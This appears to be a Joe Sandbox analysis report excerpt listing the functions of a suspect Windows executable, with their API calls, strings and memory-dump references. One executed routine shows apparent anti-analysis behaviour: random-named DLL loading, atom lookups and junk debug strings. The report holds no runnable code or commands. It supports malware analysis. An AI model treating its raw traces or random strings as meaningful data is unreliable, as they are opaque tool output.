Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00455610, Relevance: 6.0, APIs: 4, Instructions: 34

APIs

GetCurrentThreadId.KERNEL32 ref: 00455628
SetWindowsHookExA.USER32(00000003,004555CC,00000000,00000000), ref: 00455638
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00455653
CreateThread.KERNEL32(00000000,000003E8,00455570,00000000,00000000), ref: 00455677

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004259D0, Relevance: 6.0, APIs: 4, Instructions: 29

APIs

GetDC.USER32(00000000), ref: 004259D9
SelectObject.GDI32(00000000,018A002E), ref: 004259EB
GetTextMetricsA.GDI32(00000000), ref: 004259F6
ReleaseDC.USER32(00000000,00000000), ref: 00425A06

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004238C8, Relevance: 6.0, APIs: 4, Instructions: 27

APIs

DeleteObject.GDI32(?), ref: 004238CC
DeleteDC.GDI32(?), ref: 004238EC
ReleaseDC.USER32(00000000,?), ref: 004238F7
GetObjectA.GDI32(?,00000054,?), ref: 0042390C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00407090, Relevance: 6.0, APIs: 4, Instructions: 11

APIs

GlobalHandle.KERNEL32 ref: 00407093
GlobalUnlock.KERNEL32(00000000), ref: 0040709A
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040709F
GlobalLock.KERNEL32(00000000), ref: 004070A5

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0041EAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123

APIs

Part of subcall function 0041DE34: RtlEnterCriticalSection.KERNEL32(?,0041DE71), ref: 0041DE38

Part of subcall function 004083B8: CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,0041EB86,00000000,0041EC11,?,00000000,0041EC39), ref: 004083E5

CreateFontIndirectA.GDI32(?), ref: 0041EBEE

Part of subcall function 0041DE40: RtlLeaveCriticalSection.KERNEL32(-00000008,0041DF1F,0041DF27), ref: 0041DE44

Strings

Default, xrefs: 0041EB7C
MS Sans Serif, xrefs: 0041EB8D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043B13C, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111

APIs

Part of subcall function 0043B0A8: GetCapture.USER32 ref: 0043B0BB

DefWindowProcA.USER32(00000000,?,?,?), ref: 0043B243
GetCapture.USER32 ref: 0043B260

Part of subcall function 00438204: GetKeyboardState.USER32(?), ref: 0043833C

Strings

, xrefs: 0043B1B2

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0044A0F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

GetKeyState.USER32(00000010), ref: 0044A114
GetKeyState.USER32(00000011), ref: 0044A126

Strings

, xrefs: 0044A136

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00425A7B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84

APIs

RtlInitializeCriticalSection.KERNEL32(?,?,?), ref: 00425AF6
RtlEnterCriticalSection.KERNEL32(?,00425B74), ref: 00425B48

Strings

V, xrefs: 00425A7C

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004245E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72

APIs

RtlEnterCriticalSection.KERNEL32(00464A44), ref: 00424683
RtlLeaveCriticalSection.KERNEL32(00464A44,004246CE,00464A44), ref: 004246C1

Strings

DJF, xrefs: 0042462E

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043734C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56

APIs

IntersectRect.USER32(?,?,?), ref: 004373AC
EqualRect.USER32(?,?), ref: 004373BC

Strings

@, xrefs: 0043738D

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 0043F09C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43

APIs

Part of subcall function 0043F100: 6D3D5FAE.COMCTL32(?,00000000,0043F0C5,00000000,00000000,00000000), ref: 0043F118

Part of subcall function 0043EE8C: ClientToScreen.USER32(?,0043F148), ref: 0043EEA4
Part of subcall function 0043EE8C: GetWindowRect.USER32(?,?), ref: 0043EEAE

6D3D5F55.COMCTL32(?,?,LPC,?,00000000,00000000,00000000), ref: 0043F0E7

Strings

LPC, xrefs: 0043F0CE
LPC, xrefs: 0043F0DB, 0043F0DE

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004264FC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43

APIs

GetSystemMetrics.USER32(00000000), ref: 0042654D
GetSystemMetrics.USER32(00000001), ref: 00426559

Part of subcall function 0042638C: GetProcAddress.KERNEL32(757A0000,00000000,00000000,0042644B), ref: 0042640C

Strings

MonitorFromRect, xrefs: 00426511

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00425A14, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00425A21

Part of subcall function 004259D0: GetDC.USER32(00000000), ref: 004259D9
Part of subcall function 004259D0: SelectObject.GDI32(00000000,018A002E), ref: 004259EB
Part of subcall function 004259D0: GetTextMetricsA.GDI32(00000000), ref: 004259F6
Part of subcall function 004259D0: ReleaseDC.USER32(00000000,00000000), ref: 00425A06

MulDiv.KERNEL32(00000009,00000060,00000048,00000008), ref: 00425A5D

Strings

MS Sans Serif, xrefs: 00425A4A

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 004306E0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30

APIs

GetParent.USER32(00000000), ref: 0043070D
SendMessageA.USER32(00000000,00000000,00000465,00000105), ref: 00430713

Strings

hKF, xrefs: 004306EC

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Function 00434D54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19

APIs

WindowFromPoint.USER32(=LC,?), ref: 00434D5A

Part of subcall function 00434D0C: GlobalFindAtomA.KERNEL32(00000000), ref: 00434D20
Part of subcall function 00434D0C: GetPropA.USER32(00000000,00000000), ref: 00434D37

GetParent.USER32(00000000), ref: 00434D71

Strings

=LC, xrefs: 00434D58

Memory Dump Source

Source File: 00000005.00000001.188021732.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.188000011.00400000.00000002.sdmp
Associated: 00000005.00000001.188098642.0045C000.00000004.sdmp
Associated: 00000005.00000001.188128688.0045D000.00000008.sdmp
Associated: 00000005.00000001.188137105.00464000.00000004.sdmp
Associated: 00000005.00000001.188145329.00466000.00000008.sdmp
Associated: 00000005.00000001.188153403.00468000.00000004.sdmp
Associated: 00000005.00000001.188162233.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_FB_3449.jbxd

Analysis Process: FB_3804.tmp.exe PID: 3416 Parent PID: 3388

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	0.5%
Signature Coverage:	24%
Total number of Nodes:	420
Total number of Limit Nodes:	9

Executed Functions

Function 0045B93C, Relevance: 45.6, APIs: 18, Strings: 8, Instructions: 82

APIs

GetForegroundWindow.USER32 ref: 0045B95E
Sleep.KERNEL32(00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B967
GetForegroundWindow.USER32 ref: 0045B96C
OutputDebugStringA.KERNEL32(00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B98A
OutputDebugStringA.KERNEL32(w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B998
GetMessageTime.USER32 ref: 0045B99D
GetWinMetaFileBits.GDI32(00000000,00000000,00000000,00000000,00000000), ref: 0045B9AC
GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9B3
GetTickCount.KERNEL32(00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F,?,?,?,00000000), ref: 0045B9BA
LoadLibraryA.KERNEL32(AXLzZmdD9HtbQccvaUl8.dll), ref: 0045B9D2
FindAtomA.KERNEL32(RkLNPKJEBsQUb), ref: 0045B9E5

Part of subcall function 0045B894: GetConsoleCP.KERNEL32 ref: 0045B898
Part of subcall function 0045B894: GetVersion.KERNEL32 ref: 0045B8AF
Part of subcall function 0045B894: OutputDebugStringA.KERNEL32(XL6koNAzf7HqWidOVFHpYcM8w2cTaNFBEa09fFCcuH), ref: 0045B8BE

FindAtomA.KERNEL32(zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ), ref: 0045B9F4
FindAtomA.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc), ref: 0045B9FE
GetTickCount.KERNEL32(XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000,0045BA3F), ref: 0045BA03
GetModuleHandleA.KERNEL32(00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064,00000000), ref: 0045BA0F
LoadCursorA.USER32(00000000,00000000), ref: 0045BA15
GetTickCount.KERNEL32(00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000,00000064), ref: 0045BA1A
lstrlen.KERNEL32(nrv3Luf0WuUHwt0zdItIqYOEpuqSh,00000000,00000000,LUfdbTx4Qp0PQTLTD,XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc,zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ,AXLzZmdD9HtbQccvaUl8.dll,00000000,00000000,00000000,00000000,00000000,w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS,00000000,00000000,00000000), ref: 0045BA24

Strings

XH7Rlw4xvDQkHOCyEVY63qd0UnLACWYtQu9lkF5haLCZaIdSc, xrefs: 0045B9F9
LUfdbTx4Qp0PQTLTD, xrefs: 0045BA08
nrv3Luf0WuUHwt0zdItIqYOEpuqSh, xrefs: 0045BA1F
w4ZUHcHjWZiye735mOUvnkKZ6XwjXIlyrS, xrefs: 0045B993
zlVNazAPqdQa7BfpukDLxLZWhw1N0LpNT0PXD1PoRu5EwQ, xrefs: 0045B9EF
AXLzZmdD9HtbQccvaUl8.dll, xrefs: 0045B9CD
RkLNPKJEBsQUb, xrefs: 0045B9E0
W, xrefs: 0045B9DB

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00405B44, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA

Part of subcall function 0040598C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
Part of subcall function 0040598C: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
Part of subcall function 0040598C: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
Part of subcall function 0040598C: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Delphi\Locales, xrefs: 00405BB0
Software\Borland\Locales, xrefs: 00405B74, 00405B92

Memory Dump Source

Source File: 00000006.00000002.247549102.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.247543065.00400000.00000002.sdmp
Associated: 00000006.00000002.247560543.0045C000.00000004.sdmp
Associated: 00000006.00000002.247566269.0045D000.00000008.sdmp
Associated: 00000006.00000002.247572115.00464000.00000004.sdmp
Associated: 00000006.00000002.247577905.00466000.00000008.sdmp
Associated: 00000006.00000002.247584191.00468000.00000004.sdmp
Associated: 00000006.00000002.247590066.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_FB_3804.jbxd

Function 00455F9C, Relevance: 28.4, APIs: 13, Strings: 3, Instructions: 392

APIs

Part of subcall function 00455E50: SetThreadLocale.KERNEL32(00000400,?,?,?,0045600F,00000000,0045662C), ref: 00455E73

Part of subcall function 00456690: IsIconic.USER32(00000000), ref: 00456698
Part of subcall function 00456690: SetActiveWindow.USER32(00000000), ref: 004566B0
Part of subcall function 00456690: IsWindowEnabled.USER32(00000000), ref: 004566D3
Part of subcall function 00456690: SetWindowPos.USER32(00000000,00000000,?,?,?,00000000,00000040), ref: 004566FC
Part of subcall function 00456690: DefWindowProcA.USER32(00000000,00000112,0000F020,00000000), ref: 00456711

Part of subcall function 00456740: IsIconic.USER32(?), ref: 00456748
Part of subcall function 00456740: SetActiveWindow.USER32(?), ref: 00456759
Part of subcall function 00456740: IsWindowEnabled.USER32(00000000), ref: 0045677C
Part of subcall function 00456740: DefWindowProcA.USER32(?,00000112,0000F120,00000000), ref: 00456795
Part of subcall function 00456740: SetWindowPos.USER32(?,00000000,00000000,?,?,0045618A,00000000), ref: 004567DB
Part of subcall function 00456740: SetFocus.USER32(00000000), ref: 00456820

Part of subcall function 00456674: LoadIconA.USER32(00000000,00007F00), ref: 0045668A

PostMessageA.USER32(?,0000B001,00000000,00000000), ref: 00456281

Part of subcall function 00455DB4: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 00455E07

PostMessageA.USER32(?,0000B000,00000000,00000000), ref: 0045625F
SendMessageA.USER32(?,?,?,?), ref: 00456315

Part of subcall function 0040B8E4: SetErrorMode.KERNEL32 ref: 0040B8EE
Part of subcall function 0040B8E4: LoadLibraryA.KERNEL32(00000000), ref: 0040B91D

GetProcAddress.KERNEL32(00000000,RegisterAutomation,00000000,0045662C), ref: 004563A4
GetLastError.KERNEL32(00000000,0045662C), ref: 004563CD

Part of subcall function 00456A14: IsWindowEnabled.USER32(00000000), ref: 00456A50

IsWindowEnabled.USER32(00000000), ref: 0045645F
IsWindowVisible.USER32(00000000), ref: 00456474
GetFocus.USER32 ref: 00456488
SetFocus.USER32(00000000), ref: 00456497
SetFocus.USER32(00000000), ref: 004564B6
IsIconic.USER32(?), ref: 00456528
GetFocus.USER32 ref: 00456535

Part of subcall function 0044DEDC: GetCurrentThreadId.KERNEL32(Function_0004DE78,00000000,0045358A,00000000,00000000,004535DD), ref: 0044DEF6
Part of subcall function 0044DEDC: EnumThreadWindows.USER32(00000000,Function_0004DE78,00000000), ref: 0044DEFC

SetFocus.USER32(00000000), ref: 00456556

Part of subcall function 0045707C: PostMessageA.USER32(?,0000B01F,?,?), ref: 0045719D

Part of subcall function 00456B98: SendMessageA.USER32(000800B8,0000B020,00000001,?), ref: 00456BBC

Part of subcall function 00456B3C: SendMessageA.USER32(000800B8,0000B020,00000000,?), ref: 00456B5E

Part of subcall function 00441ED8: SystemParametersInfoA.USER32(00000068,00000000,00433DB0,00000000), ref: 00441F1C
Part of subcall function 00441ED8: SendMessageA.USER32(90C30000,00000000,00000000,00000000), ref: 00441F2F

Part of subcall function 00455F14: DefWindowProcA.USER32(?,?,?,?), ref: 00455F3E

Strings

vcltest3.dll, xrefs: 00456374
RegisterAutomation, xrefs: 00456395
dKF, xrefs: 004565E1

Memory Dump Source

